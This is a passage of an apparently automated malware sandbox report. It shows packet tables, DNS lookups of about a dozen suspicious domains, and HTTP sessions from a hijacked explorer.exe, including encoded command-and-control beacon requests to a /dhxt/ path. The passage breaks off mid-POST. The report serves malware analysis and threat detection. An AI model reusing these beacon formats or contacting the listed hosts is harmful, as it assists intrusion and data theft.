                                                                                                              Feb 6, 2023 14:39:08.673151016 CET4970580192.168.2.4132.148.233.235
                                                                                                              Feb 6, 2023 14:39:08.673165083 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.673197985 CET4970580192.168.2.4132.148.233.235
                                                                                                              Feb 6, 2023 14:39:08.673227072 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.673249960 CET4970580192.168.2.4132.148.233.235
                                                                                                              Feb 6, 2023 14:39:08.673291922 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.673350096 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.673506975 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.673604012 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.673629045 CET4970580192.168.2.4132.148.233.235
                                                                                                              Feb 6, 2023 14:39:08.673629045 CET4970580192.168.2.4132.148.233.235
                                                                                                              Feb 6, 2023 14:39:08.673665047 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.673722029 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.673727989 CET4970580192.168.2.4132.148.233.235
                                                                                                              Feb 6, 2023 14:39:08.673779964 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.673896074 CET4970580192.168.2.4132.148.233.235
                                                                                                              Feb 6, 2023 14:39:08.683639050 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.683717012 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.683918953 CET4970580192.168.2.4132.148.233.235
                                                                                                              Feb 6, 2023 14:39:08.840850115 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.841207027 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.841234922 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.841259956 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.841284990 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.841310024 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.841382980 CET4970580192.168.2.4132.148.233.235
                                                                                                              Feb 6, 2023 14:39:08.841463089 CET4970580192.168.2.4132.148.233.235
                                                                                                              Feb 6, 2023 14:39:08.841463089 CET4970580192.168.2.4132.148.233.235
                                                                                                              Feb 6, 2023 14:39:08.841723919 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.841829062 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.841856003 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.841886997 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.841888905 CET4970580192.168.2.4132.148.233.235
                                                                                                              Feb 6, 2023 14:39:08.841917038 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.841981888 CET4970580192.168.2.4132.148.233.235
                                                                                                              Feb 6, 2023 14:39:08.842060089 CET4970580192.168.2.4132.148.233.235
                                                                                                              Feb 6, 2023 14:39:08.842202902 CET4970580192.168.2.4132.148.233.235
                                                                                                              Feb 6, 2023 14:39:09.008445978 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:14.184139967 CET4970680192.168.2.4154.205.192.37
                                                                                                              Feb 6, 2023 14:39:14.354250908 CET8049706154.205.192.37192.168.2.4
                                                                                                              Feb 6, 2023 14:39:14.354490042 CET4970680192.168.2.4154.205.192.37
                                                                                                              Feb 6, 2023 14:39:14.383770943 CET4970680192.168.2.4154.205.192.37
                                                                                                              Feb 6, 2023 14:39:14.553841114 CET8049706154.205.192.37192.168.2.4
                                                                                                              Feb 6, 2023 14:39:14.559606075 CET8049706154.205.192.37192.168.2.4
                                                                                                              Feb 6, 2023 14:39:14.559638977 CET8049706154.205.192.37192.168.2.4
                                                                                                              Feb 6, 2023 14:39:14.559870958 CET4970680192.168.2.4154.205.192.37
                                                                                                              Feb 6, 2023 14:39:15.898736000 CET4970680192.168.2.4154.205.192.37
                                                                                                              Feb 6, 2023 14:39:16.914680004 CET4970780192.168.2.4154.205.192.37
                                                                                                              Feb 6, 2023 14:39:17.079495907 CET8049707154.205.192.37192.168.2.4
                                                                                                              Feb 6, 2023 14:39:17.079694986 CET4970780192.168.2.4154.205.192.37
                                                                                                              Feb 6, 2023 14:39:17.079830885 CET4970780192.168.2.4154.205.192.37
                                                                                                              Feb 6, 2023 14:39:17.244308949 CET8049707154.205.192.37192.168.2.4
                                                                                                              Feb 6, 2023 14:39:17.246885061 CET8049707154.205.192.37192.168.2.4
                                                                                                              Feb 6, 2023 14:39:17.246912003 CET8049707154.205.192.37192.168.2.4
                                                                                                              Feb 6, 2023 14:39:17.247147083 CET4970780192.168.2.4154.205.192.37
                                                                                                              Feb 6, 2023 14:39:17.247313976 CET4970780192.168.2.4154.205.192.37
                                                                                                              Feb 6, 2023 14:39:17.412523031 CET8049707154.205.192.37192.168.2.4
                                                                                                              Feb 6, 2023 14:39:22.330636978 CET4970880192.168.2.4217.76.156.252
                                                                                                              Feb 6, 2023 14:39:22.383141994 CET8049708217.76.156.252192.168.2.4
                                                                                                              Feb 6, 2023 14:39:22.383295059 CET4970880192.168.2.4217.76.156.252
                                                                                                              Feb 6, 2023 14:39:22.384221077 CET4970880192.168.2.4217.76.156.252
                                                                                                              Feb 6, 2023 14:39:22.436633110 CET8049708217.76.156.252192.168.2.4
                                                                                                              Feb 6, 2023 14:39:22.443350077 CET8049708217.76.156.252192.168.2.4
                                                                                                              Feb 6, 2023 14:39:22.443392992 CET8049708217.76.156.252192.168.2.4
                                                                                                              Feb 6, 2023 14:39:22.443420887 CET8049708217.76.156.252192.168.2.4
                                                                                                              Feb 6, 2023 14:39:22.443444967 CET4970880192.168.2.4217.76.156.252
                                                                                                              Feb 6, 2023 14:39:22.443449020 CET8049708217.76.156.252192.168.2.4
                                                                                                              Feb 6, 2023 14:39:22.443475962 CET8049708217.76.156.252192.168.2.4
                                                                                                              Feb 6, 2023 14:39:22.443487883 CET4970880192.168.2.4217.76.156.252
                                                                                                              Feb 6, 2023 14:39:22.443501949 CET8049708217.76.156.252192.168.2.4
                                                                                                              Feb 6, 2023 14:39:22.443523884 CET8049708217.76.156.252192.168.2.4
                                                                                                              Feb 6, 2023 14:39:22.443543911 CET8049708217.76.156.252192.168.2.4
                                                                                                              Feb 6, 2023 14:39:22.443547010 CET4970880192.168.2.4217.76.156.252
                                                                                                              Feb 6, 2023 14:39:22.443587065 CET4970880192.168.2.4217.76.156.252
                                                                                                              Feb 6, 2023 14:39:23.900613070 CET4970880192.168.2.4217.76.156.252
                                                                                                              Feb 6, 2023 14:39:24.933696985 CET4970980192.168.2.4217.76.156.252
                                                                                                              Feb 6, 2023 14:39:24.986774921 CET8049709217.76.156.252192.168.2.4
                                                                                                              Feb 6, 2023 14:39:24.987087965 CET4970980192.168.2.4217.76.156.252
                                                                                                              Feb 6, 2023 14:39:24.987344980 CET4970980192.168.2.4217.76.156.252
                                                                                                              Feb 6, 2023 14:39:25.039514065 CET8049709217.76.156.252192.168.2.4
                                                                                                              Feb 6, 2023 14:39:25.047147989 CET8049709217.76.156.252192.168.2.4
                                                                                                              Feb 6, 2023 14:39:25.047189951 CET8049709217.76.156.252192.168.2.4
                                                                                                              Feb 6, 2023 14:39:25.047219038 CET8049709217.76.156.252192.168.2.4
                                                                                                              Feb 6, 2023 14:39:25.047246933 CET8049709217.76.156.252192.168.2.4
                                                                                                              Feb 6, 2023 14:39:25.047274113 CET8049709217.76.156.252192.168.2.4
                                                                                                              Feb 6, 2023 14:39:25.047297955 CET8049709217.76.156.252192.168.2.4
                                                                                                              Feb 6, 2023 14:39:25.047317028 CET8049709217.76.156.252192.168.2.4
                                                                                                              Feb 6, 2023 14:39:25.047337055 CET8049709217.76.156.252192.168.2.4
                                                                                                              Feb 6, 2023 14:39:25.047370911 CET4970980192.168.2.4217.76.156.252
                                                                                                              Feb 6, 2023 14:39:25.047506094 CET4970980192.168.2.4217.76.156.252
                                                                                                              Feb 6, 2023 14:39:25.053149939 CET4970980192.168.2.4217.76.156.252
                                                                                                              Feb 6, 2023 14:39:25.105470896 CET8049709217.76.156.252192.168.2.4
                                                                                                              Feb 6, 2023 14:39:30.099385977 CET4971080192.168.2.4199.59.243.222
                                                                                                              Feb 6, 2023 14:39:30.120192051 CET8049710199.59.243.222192.168.2.4
                                                                                                              Feb 6, 2023 14:39:30.120335102 CET4971080192.168.2.4199.59.243.222
                                                                                                              Feb 6, 2023 14:39:30.120506048 CET4971080192.168.2.4199.59.243.222
                                                                                                              Feb 6, 2023 14:39:30.139801979 CET8049710199.59.243.222192.168.2.4
                                                                                                              Feb 6, 2023 14:39:30.323227882 CET8049710199.59.243.222192.168.2.4
                                                                                                              Feb 6, 2023 14:39:30.323259115 CET8049710199.59.243.222192.168.2.4
                                                                                                              Feb 6, 2023 14:39:30.323276997 CET8049710199.59.243.222192.168.2.4
                                                                                                              Feb 6, 2023 14:39:30.323441029 CET4971080192.168.2.4199.59.243.222
                                                                                                              Feb 6, 2023 14:39:30.337869883 CET8049710199.59.243.222192.168.2.4
                                                                                                              Feb 6, 2023 14:39:30.338646889 CET4971080192.168.2.4199.59.243.222
                                                                                                              Feb 6, 2023 14:39:31.634628057 CET4971080192.168.2.4199.59.243.222
                                                                                                              Feb 6, 2023 14:39:32.652720928 CET4971180192.168.2.4199.59.243.222
                                                                                                              Feb 6, 2023 14:39:32.673559904 CET8049711199.59.243.222192.168.2.4
                                                                                                              Feb 6, 2023 14:39:32.673746109 CET4971180192.168.2.4199.59.243.222
                                                                                                              Feb 6, 2023 14:39:32.673954010 CET4971180192.168.2.4199.59.243.222
                                                                                                              Feb 6, 2023 14:39:32.693361998 CET8049711199.59.243.222192.168.2.4
                                                                                                              Feb 6, 2023 14:39:32.876430988 CET8049711199.59.243.222192.168.2.4
                                                                                                              Feb 6, 2023 14:39:32.876487017 CET8049711199.59.243.222192.168.2.4
                                                                                                              Feb 6, 2023 14:39:32.876513958 CET8049711199.59.243.222192.168.2.4
                                                                                                              Feb 6, 2023 14:39:32.876537085 CET8049711199.59.243.222192.168.2.4
                                                                                                              Feb 6, 2023 14:39:32.876702070 CET4971180192.168.2.4199.59.243.222
                                                                                                              Feb 6, 2023 14:39:32.877068996 CET4971180192.168.2.4199.59.243.222
                                                                                                              Feb 6, 2023 14:39:32.892798901 CET8049711199.59.243.222192.168.2.4
                                                                                                              Feb 6, 2023 14:39:32.892909050 CET4971180192.168.2.4199.59.243.222
                                                                                                              Feb 6, 2023 14:39:32.896514893 CET8049711199.59.243.222192.168.2.4
                                                                                                              Feb 6, 2023 14:39:38.067676067 CET4971280192.168.2.4156.255.170.114
                                                                                                              Feb 6, 2023 14:39:38.267317057 CET8049712156.255.170.114192.168.2.4
                                                                                                              Feb 6, 2023 14:39:38.267632961 CET4971280192.168.2.4156.255.170.114
                                                                                                              Feb 6, 2023 14:39:38.267879963 CET4971280192.168.2.4156.255.170.114
                                                                                                              Feb 6, 2023 14:39:38.467241049 CET8049712156.255.170.114192.168.2.4
                                                                                                              Feb 6, 2023 14:39:38.467339993 CET8049712156.255.170.114192.168.2.4
                                                                                                              Feb 6, 2023 14:39:38.467370987 CET8049712156.255.170.114192.168.2.4
                                                                                                              Feb 6, 2023 14:39:38.467649937 CET4971280192.168.2.4156.255.170.114
                                                                                                              Feb 6, 2023 14:39:39.776547909 CET4971280192.168.2.4156.255.170.114
                                                                                                              Feb 6, 2023 14:39:40.794923067 CET4971380192.168.2.4156.255.170.114
                                                                                                              Feb 6, 2023 14:39:40.994744062 CET8049713156.255.170.114192.168.2.4
                                                                                                              Feb 6, 2023 14:39:40.996618032 CET4971380192.168.2.4156.255.170.114
                                                                                                              Feb 6, 2023 14:39:41.003834009 CET4971380192.168.2.4156.255.170.114
                                                                                                              Feb 6, 2023 14:39:41.203739882 CET8049713156.255.170.114192.168.2.4
                                                                                                              Feb 6, 2023 14:39:41.203809977 CET8049713156.255.170.114192.168.2.4
                                                                                                              Feb 6, 2023 14:39:41.203847885 CET8049713156.255.170.114192.168.2.4
                                                                                                              Feb 6, 2023 14:39:41.204046011 CET4971380192.168.2.4156.255.170.114
                                                                                                              Feb 6, 2023 14:39:41.204216003 CET4971380192.168.2.4156.255.170.114
                                                                                                              Feb 6, 2023 14:39:41.403594971 CET8049713156.255.170.114192.168.2.4
                                                                                                              Feb 6, 2023 14:39:46.258409023 CET4971480192.168.2.43.127.73.216
                                                                                                              Feb 6, 2023 14:39:46.281927109 CET80497143.127.73.216192.168.2.4
                                                                                                              Feb 6, 2023 14:39:46.282150030 CET4971480192.168.2.43.127.73.216
                                                                                                              Feb 6, 2023 14:39:46.292882919 CET4971480192.168.2.43.127.73.216
                                                                                                              Feb 6, 2023 14:39:46.313505888 CET80497143.127.73.216192.168.2.4
                                                                                                              Feb 6, 2023 14:39:46.313869953 CET80497143.127.73.216192.168.2.4
                                                                                                              Feb 6, 2023 14:39:46.313889980 CET80497143.127.73.216192.168.2.4
                                                                                                              Feb 6, 2023 14:39:46.313976049 CET4971480192.168.2.43.127.73.216
                                                                                                              Feb 6, 2023 14:39:47.808267117 CET4971480192.168.2.43.127.73.216
                                                                                                              Feb 6, 2023 14:39:48.823852062 CET4971580192.168.2.43.127.73.216
                                                                                                              Feb 6, 2023 14:39:48.845818043 CET80497153.127.73.216192.168.2.4
                                                                                                              Feb 6, 2023 14:39:48.846054077 CET4971580192.168.2.43.127.73.216
                                                                                                              Feb 6, 2023 14:39:48.846231937 CET4971580192.168.2.43.127.73.216
                                                                                                              Feb 6, 2023 14:39:48.868186951 CET80497153.127.73.216192.168.2.4
                                                                                                              Feb 6, 2023 14:39:48.868232012 CET80497153.127.73.216192.168.2.4
                                                                                                              Feb 6, 2023 14:39:48.868253946 CET80497153.127.73.216192.168.2.4
                                                                                                              Feb 6, 2023 14:39:48.868485928 CET4971580192.168.2.43.127.73.216
                                                                                                              Feb 6, 2023 14:39:48.868669033 CET4971580192.168.2.43.127.73.216
                                                                                                              Feb 6, 2023 14:39:48.888928890 CET80497153.127.73.216192.168.2.4
                                                                                                              Feb 6, 2023 14:39:54.174701929 CET4971680192.168.2.4164.88.122.250
                                                                                                              Feb 6, 2023 14:39:54.497987032 CET8049716164.88.122.250192.168.2.4
                                                                                                              Feb 6, 2023 14:39:54.498246908 CET4971680192.168.2.4164.88.122.250
                                                                                                              Feb 6, 2023 14:39:54.498359919 CET4971680192.168.2.4164.88.122.250
                                                                                                              Feb 6, 2023 14:39:54.828010082 CET8049716164.88.122.250192.168.2.4
                                                                                                              Feb 6, 2023 14:39:54.828052044 CET8049716164.88.122.250192.168.2.4
                                                                                                              Feb 6, 2023 14:39:54.828073978 CET8049716164.88.122.250192.168.2.4
                                                                                                              Feb 6, 2023 14:39:54.828268051 CET4971680192.168.2.4164.88.122.250
                                                                                                              Feb 6, 2023 14:39:54.834284067 CET8049716164.88.122.250192.168.2.4
                                                                                                              Feb 6, 2023 14:39:54.834479094 CET4971680192.168.2.4164.88.122.250
                                                                                                              Feb 6, 2023 14:39:56.011245012 CET4971680192.168.2.4164.88.122.250
                                                                                                              Feb 6, 2023 14:39:57.027587891 CET4971780192.168.2.4164.88.122.250
                                                                                                              Feb 6, 2023 14:39:57.346442938 CET8049717164.88.122.250192.168.2.4
                                                                                                              Feb 6, 2023 14:39:57.346662998 CET4971780192.168.2.4164.88.122.250
                                                                                                              Feb 6, 2023 14:39:57.346777916 CET4971780192.168.2.4164.88.122.250
                                                                                                              Feb 6, 2023 14:39:57.682760954 CET8049717164.88.122.250192.168.2.4
                                                                                                              Feb 6, 2023 14:39:57.682811022 CET8049717164.88.122.250192.168.2.4
                                                                                                              Feb 6, 2023 14:39:57.682852030 CET8049717164.88.122.250192.168.2.4
                                                                                                              Feb 6, 2023 14:39:57.683058023 CET4971780192.168.2.4164.88.122.250
                                                                                                              Feb 6, 2023 14:39:57.693284035 CET8049717164.88.122.250192.168.2.4
                                                                                                              Feb 6, 2023 14:39:57.696433067 CET4971780192.168.2.4164.88.122.250
                                                                                                              Feb 6, 2023 14:39:57.696506977 CET4971780192.168.2.4164.88.122.250
                                                                                                              Feb 6, 2023 14:39:58.016433954 CET8049717164.88.122.250192.168.2.4
                                                                                                              Feb 6, 2023 14:40:02.763560057 CET4971880192.168.2.481.169.145.72
                                                                                                              Feb 6, 2023 14:40:02.785485983 CET804971881.169.145.72192.168.2.4
                                                                                                              Feb 6, 2023 14:40:02.785732985 CET4971880192.168.2.481.169.145.72
                                                                                                              Feb 6, 2023 14:40:02.849679947 CET4971880192.168.2.481.169.145.72
                                                                                                              Feb 6, 2023 14:40:02.871134996 CET804971881.169.145.72192.168.2.4
                                                                                                              Feb 6, 2023 14:40:02.872836113 CET804971881.169.145.72192.168.2.4
                                                                                                              Feb 6, 2023 14:40:02.872863054 CET804971881.169.145.72192.168.2.4
                                                                                                              Feb 6, 2023 14:40:02.872957945 CET4971880192.168.2.481.169.145.72
                                                                                                              Feb 6, 2023 14:40:04.375560045 CET4971880192.168.2.481.169.145.72
                                                                                                              Feb 6, 2023 14:40:05.387940884 CET4971980192.168.2.481.169.145.72
                                                                                                              Feb 6, 2023 14:40:05.410208941 CET804971981.169.145.72192.168.2.4
                                                                                                              Feb 6, 2023 14:40:05.410413027 CET4971980192.168.2.481.169.145.72
                                                                                                              Feb 6, 2023 14:40:05.410651922 CET4971980192.168.2.481.169.145.72
                                                                                                              Feb 6, 2023 14:40:05.432136059 CET804971981.169.145.72192.168.2.4
                                                                                                              Feb 6, 2023 14:40:05.433163881 CET804971981.169.145.72192.168.2.4
                                                                                                              Feb 6, 2023 14:40:05.433208942 CET804971981.169.145.72192.168.2.4
                                                                                                              Feb 6, 2023 14:40:05.433410883 CET4971980192.168.2.481.169.145.72
                                                                                                              Feb 6, 2023 14:40:05.433631897 CET4971980192.168.2.481.169.145.72
                                                                                                              Feb 6, 2023 14:40:05.454976082 CET804971981.169.145.72192.168.2.4

                                                                                                              UDP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Feb 6, 2023 14:38:20.564807892 CET5657253192.168.2.48.8.8.8
                                                                                                              Feb 6, 2023 14:38:20.710185051 CET53565728.8.8.8192.168.2.4
                                                                                                              Feb 6, 2023 14:38:31.037887096 CET5091153192.168.2.48.8.8.8
                                                                                                              Feb 6, 2023 14:38:31.062824011 CET53509118.8.8.8192.168.2.4
                                                                                                              Feb 6, 2023 14:38:38.903697014 CET5968353192.168.2.48.8.8.8
                                                                                                              Feb 6, 2023 14:38:38.982378006 CET53596838.8.8.8192.168.2.4
                                                                                                              Feb 6, 2023 14:38:46.743694067 CET6416753192.168.2.48.8.8.8
                                                                                                              Feb 6, 2023 14:38:46.774025917 CET53641678.8.8.8192.168.2.4
                                                                                                              Feb 6, 2023 14:38:56.789658070 CET5856553192.168.2.48.8.8.8
                                                                                                              Feb 6, 2023 14:38:56.813150883 CET53585658.8.8.8192.168.2.4
                                                                                                              Feb 6, 2023 14:39:05.182425022 CET5223953192.168.2.48.8.8.8
                                                                                                              Feb 6, 2023 14:39:05.206569910 CET53522398.8.8.8192.168.2.4
                                                                                                              Feb 6, 2023 14:39:13.872448921 CET5680753192.168.2.48.8.8.8
                                                                                                              Feb 6, 2023 14:39:14.182938099 CET53568078.8.8.8192.168.2.4
                                                                                                              Feb 6, 2023 14:39:22.280570030 CET6100753192.168.2.48.8.8.8
                                                                                                              Feb 6, 2023 14:39:22.328759909 CET53610078.8.8.8192.168.2.4
                                                                                                              Feb 6, 2023 14:39:30.073498964 CET6068653192.168.2.48.8.8.8
                                                                                                              Feb 6, 2023 14:39:30.098217964 CET53606868.8.8.8192.168.2.4
                                                                                                              Feb 6, 2023 14:39:37.894309044 CET6112453192.168.2.48.8.8.8
                                                                                                              Feb 6, 2023 14:39:38.065663099 CET53611248.8.8.8192.168.2.4
                                                                                                              Feb 6, 2023 14:39:46.228657961 CET5944453192.168.2.48.8.8.8
                                                                                                              Feb 6, 2023 14:39:46.256738901 CET53594448.8.8.8192.168.2.4
                                                                                                              Feb 6, 2023 14:39:53.873554945 CET5557053192.168.2.48.8.8.8
                                                                                                              Feb 6, 2023 14:39:54.173079967 CET53555708.8.8.8192.168.2.4
                                                                                                              Feb 6, 2023 14:40:02.740058899 CET6490653192.168.2.48.8.8.8
                                                                                                              Feb 6, 2023 14:40:02.761456013 CET53649068.8.8.8192.168.2.4

                                                                                                              DNS Queries

                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                              Feb 6, 2023 14:38:20.564807892 CET192.168.2.48.8.8.80x4c3cStandard query (0)www.utmedicined.comA (IP address)IN (0x0001)false
                                                                                                              Feb 6, 2023 14:38:31.037887096 CET192.168.2.48.8.8.80x5ce9Standard query (0)www.b-yy.xyzA (IP address)IN (0x0001)false
                                                                                                              Feb 6, 2023 14:38:38.903697014 CET192.168.2.48.8.8.80xf4e1Standard query (0)www.fildoor.storeA (IP address)IN (0x0001)false
                                                                                                              Feb 6, 2023 14:38:46.743694067 CET192.168.2.48.8.8.80x64dbStandard query (0)www.parkhomenko-zinaida.ruA (IP address)IN (0x0001)false
                                                                                                              Feb 6, 2023 14:38:56.789658070 CET192.168.2.48.8.8.80x861eStandard query (0)www.dezella.xyzA (IP address)IN (0x0001)false
                                                                                                              Feb 6, 2023 14:39:05.182425022 CET192.168.2.48.8.8.80xb06bStandard query (0)www.staciesellslka.comA (IP address)IN (0x0001)false
                                                                                                              Feb 6, 2023 14:39:13.872448921 CET192.168.2.48.8.8.80x7c0eStandard query (0)www.gmbuxie.netA (IP address)IN (0x0001)false
                                                                                                              Feb 6, 2023 14:39:22.280570030 CET192.168.2.48.8.8.80x80dcStandard query (0)www.lastmilerent.comA (IP address)IN (0x0001)false
                                                                                                              Feb 6, 2023 14:39:30.073498964 CET192.168.2.48.8.8.80xb1a9Standard query (0)www.moneycarrewards.comA (IP address)IN (0x0001)false
                                                                                                              Feb 6, 2023 14:39:37.894309044 CET192.168.2.48.8.8.80x2a76Standard query (0)www.cmproutdoors.comA (IP address)IN (0x0001)false
                                                                                                              Feb 6, 2023 14:39:46.228657961 CET192.168.2.48.8.8.80x65a9Standard query (0)www.ontheverge.walesA (IP address)IN (0x0001)false
                                                                                                              Feb 6, 2023 14:39:53.873554945 CET192.168.2.48.8.8.80x2a1aStandard query (0)www.0w3jy.comA (IP address)IN (0x0001)false
                                                                                                              Feb 6, 2023 14:40:02.740058899 CET192.168.2.48.8.8.80xc394Standard query (0)www.frogair.onlineA (IP address)IN (0x0001)false

                                                                                                              DNS Answers

                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                              Feb 6, 2023 14:38:20.710185051 CET8.8.8.8192.168.2.40x4c3cNo error (0)www.utmedicined.com63.141.242.45A (IP address)IN (0x0001)false
                                                                                                              Feb 6, 2023 14:38:31.062824011 CET8.8.8.8192.168.2.40x5ce9No error (0)www.b-yy.xyz172.67.156.58A (IP address)IN (0x0001)false
                                                                                                              Feb 6, 2023 14:38:31.062824011 CET8.8.8.8192.168.2.40x5ce9No error (0)www.b-yy.xyz104.21.74.71A (IP address)IN (0x0001)false
                                                                                                              Feb 6, 2023 14:38:38.982378006 CET8.8.8.8192.168.2.40xf4e1No error (0)www.fildoor.store87.236.16.107A (IP address)IN (0x0001)false
                                                                                                              Feb 6, 2023 14:38:46.774025917 CET8.8.8.8192.168.2.40x64dbNo error (0)www.parkhomenko-zinaida.ruparkhomenko-zinaida.ruCNAME (Canonical name)IN (0x0001)false
                                                                                                              Feb 6, 2023 14:38:46.774025917 CET8.8.8.8192.168.2.40x64dbNo error (0)parkhomenko-zinaida.ru185.215.4.36A (IP address)IN (0x0001)false
                                                                                                              Feb 6, 2023 14:38:56.813150883 CET8.8.8.8192.168.2.40x861eNo error (0)www.dezella.xyz199.192.28.121A (IP address)IN (0x0001)false
                                                                                                              Feb 6, 2023 14:39:05.206569910 CET8.8.8.8192.168.2.40xb06bNo error (0)www.staciesellslka.comstaciesellslka.comCNAME (Canonical name)IN (0x0001)false
                                                                                                              Feb 6, 2023 14:39:05.206569910 CET8.8.8.8192.168.2.40xb06bNo error (0)staciesellslka.com132.148.233.235A (IP address)IN (0x0001)false
                                                                                                              Feb 6, 2023 14:39:14.182938099 CET8.8.8.8192.168.2.40x7c0eNo error (0)www.gmbuxie.net154.205.192.37A (IP address)IN (0x0001)false
                                                                                                              Feb 6, 2023 14:39:22.328759909 CET8.8.8.8192.168.2.40x80dcNo error (0)www.lastmilerent.com217.76.156.252A (IP address)IN (0x0001)false
                                                                                                              Feb 6, 2023 14:39:30.098217964 CET8.8.8.8192.168.2.40xb1a9No error (0)www.moneycarrewards.com199.59.243.222A (IP address)IN (0x0001)false
                                                                                                              Feb 6, 2023 14:39:38.065663099 CET8.8.8.8192.168.2.40x2a76No error (0)www.cmproutdoors.com156.255.170.114A (IP address)IN (0x0001)false
                                                                                                              Feb 6, 2023 14:39:46.256738901 CET8.8.8.8192.168.2.40x65a9No error (0)www.ontheverge.waless.multiscreensite.comCNAME (Canonical name)IN (0x0001)false
                                                                                                              Feb 6, 2023 14:39:46.256738901 CET8.8.8.8192.168.2.40x65a9No error (0)s.multiscreensite.comglobal.multiscreensite.comCNAME (Canonical name)IN (0x0001)false
                                                                                                              Feb 6, 2023 14:39:46.256738901 CET8.8.8.8192.168.2.40x65a9No error (0)global.multiscreensite.comd1-hitch-eu-nlb-e064e2845fd0c838.elb.eu-central-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                              Feb 6, 2023 14:39:46.256738901 CET8.8.8.8192.168.2.40x65a9No error (0)d1-hitch-eu-nlb-e064e2845fd0c838.elb.eu-central-1.amazonaws.com3.127.73.216A (IP address)IN (0x0001)false
                                                                                                              Feb 6, 2023 14:39:46.256738901 CET8.8.8.8192.168.2.40x65a9No error (0)d1-hitch-eu-nlb-e064e2845fd0c838.elb.eu-central-1.amazonaws.com3.67.141.185A (IP address)IN (0x0001)false
                                                                                                              Feb 6, 2023 14:39:46.256738901 CET8.8.8.8192.168.2.40x65a9No error (0)d1-hitch-eu-nlb-e064e2845fd0c838.elb.eu-central-1.amazonaws.com18.193.36.153A (IP address)IN (0x0001)false
                                                                                                              Feb 6, 2023 14:39:54.173079967 CET8.8.8.8192.168.2.40x2a1aNo error (0)www.0w3jy.comhk.ygrcw.cnCNAME (Canonical name)IN (0x0001)false
                                                                                                              Feb 6, 2023 14:39:54.173079967 CET8.8.8.8192.168.2.40x2a1aNo error (0)hk.ygrcw.cn164.88.122.250A (IP address)IN (0x0001)false
                                                                                                              Feb 6, 2023 14:40:02.761456013 CET8.8.8.8192.168.2.40xc394No error (0)www.frogair.onlinefrogair.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                              Feb 6, 2023 14:40:02.761456013 CET8.8.8.8192.168.2.40xc394No error (0)frogair.online81.169.145.72A (IP address)IN (0x0001)false

                                                                                                              HTTP Request Dependency Graph

                                                                                                              • www.utmedicined.com
                                                                                                              • www.b-yy.xyz
                                                                                                              • www.fildoor.store
                                                                                                              • www.parkhomenko-zinaida.ru
                                                                                                              • www.dezella.xyz
                                                                                                              • www.staciesellslka.com
                                                                                                              • www.gmbuxie.net
                                                                                                              • www.lastmilerent.com
                                                                                                              • www.moneycarrewards.com
                                                                                                              • www.cmproutdoors.com
                                                                                                              • www.ontheverge.wales
                                                                                                              • www.0w3jy.com
                                                                                                              • www.frogair.online

                                                                                                              HTTP Packets

                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              0192.168.2.44969563.141.242.4580C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Feb 6, 2023 14:38:20.853791952 CET127OUTGET /dhxt/?2ani-=qhGAdkIKoH&UlkAHnsI=GMJpuu0CUPuENYia2wBq5vF0+NhzyO/+t2WdNBBbZP32/2p6mtsWQVykz4YrZzp7DrUWVvB/4Ftn1F9mFxE3fjZXBYQ8lylMnw== HTTP/1.1
                                                                                                              Host: www.utmedicined.com
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Feb 6, 2023 14:38:21.002548933 CET128INHTTP/1.1 302 Found
                                                                                                              cache-control: max-age=0, private, must-revalidate
                                                                                                              connection: close
                                                                                                              content-length: 11
                                                                                                              date: Mon, 06 Feb 2023 13:38:20 GMT
                                                                                                              location: http://survey-smiles.com
                                                                                                              server: nginx
                                                                                                              set-cookie: sid=8552f4a2-a623-11ed-9d7e-70631573cfa6; path=/; domain=.utmedicined.com; expires=Sat, 24 Feb 2091 16:52:27 GMT; max-age=2147483647; HttpOnly
                                                                                                              Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
                                                                                                              Data Ascii: Redirecting


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              1192.168.2.449696172.67.156.5880C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Feb 6, 2023 14:38:31.086448908 CET129OUTPOST /dhxt/ HTTP/1.1
                                                                                                              Host: www.b-yy.xyz
                                                                                                              Connection: close
                                                                                                              Content-Length: 190
                                                                                                              Cache-Control: no-cache
